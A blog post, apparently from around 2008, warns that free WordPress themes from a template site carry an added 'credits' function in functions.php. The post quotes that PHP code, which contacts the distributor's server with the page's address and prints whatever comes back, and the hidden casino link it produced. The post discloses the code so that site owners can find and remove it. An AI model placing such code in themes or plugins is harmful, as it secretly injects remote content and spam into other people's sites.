Templatebrowser puts link spam in WordPress

If you have ever downloaded a WordPress template from the TemplateBrowser site, please read!

Yesterday, something very ugly revealed itself and I wanted to make as many people aware of it as I could.

At the very bottom of the WordPress blog, the words Online Casino began to appear. This happened on 2 blogs that I oversee. At first I thought there was something wrong with my server. I searched all through the PHP files for the name of the site (statcounter), but couldn’t find it.

You couldn’t see this text using a browser, it was set to be hidden. A friend of mine using IE 7 discovered it when an error appeared after loading the page. Looking at the source of the blog showed the name of the statcounter website embedded at the very bottom of the page. And the text of “Online Casino” was at the bottom of the page. Firefox and IE 6 did not show an error, but if you watched very carefully you could see a quick connection to the statscounter site to grab data.

We searched all over and finally came across this page which seems to reveal everything!

Templatesbrowser.com_puts_link_spam_in_WordPress

It seems the site Templatebrowser which hosts hundreds of free WordPress templates is injecting SPAM code into the WordPress files so it can secretly link to other sites. Here is the text of the article from Onnoot.com.


My brother Wessel used to be very positive about the thousands of free WordPress themes that you can download to markup your weblog.

But one should be careful. With my web page monitoring service Follow That Page, which also monitors hidden text, I found that my brothers website contained hidden commercial links to casinos and hotels. My brother checked it out and discovered the site that is responsible for all this: www.templatesbrowser.com/wordpress-themes/.

How does Templatesbrowser.com work?
On their site, you can download more than hundred free WordPress themes. These themes come from other websites, but Templatesbrowser.com adds a sneaky piece of code at the end of the file functions.php:


function credits()
{
$url = "http://get.templatesbrowser.com/wp.php?" . "url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
$check = @fsockopen("get.templatesbrowser.com", 80, $errno, $errstr, 3);
if($check)
{
@readfile($url);
fclose($check);
}
}

If you use one of those templates in your WordPress weblog, this piece of PHP code returns the following HTML code:

<div id="copyl" style="display: none;"><a href="http://www.casinotropez.[...]">casino en ligne</a></div>


This produces a link at the bottom of every WordPress page, that is invisible for human readers.

Templatesbrowser.com apparently does this to increase the pagerank of certain websites. We’re not sure if Google falls for this little link spam trick. But if Google does find out that your page contains link spam, you risk being punished. That could mean that your website is removed from Google’s search result pages.

I did exactly as the article said and low and behold I have the “credits function” in my blog code. I removed it and the hidden link disappeared off the main page and there was no trace of it in the source code of the web page.

If you have every downloaded a template from Templatebrowser, please check the functions.php code and remove their link! We have also removed a link back to their main site and will never download a file from them again!

A huge thank you to Onno for this discovery, and an even bigger GO TO HELL YOU MISERABLE BASTARDS to Templatebrowser for putting crap code into a template they don’t even own and making it look like the template’s author may be to blame. This is shameful and WordPress and the template authors should work to shut that piece of crap site down!


Technorati : , , , , , , ,
Del.icio.us : , , , , , , ,
Ice Rocket : , , , , , , ,

Other Articles of Interest:

One Response to “Templatebrowser puts link spam in WordPress”

  • ej:

    Wow, nice of you to give credit to your buddy for noticing the problem, fixing it, and finding reference to the web page mentioning it.
    Geez man, for the first time in a long time, I mangaged to figure something out before you…
    Can’t I get a little love
    Great site by the way.
    later
    e

Leave a Reply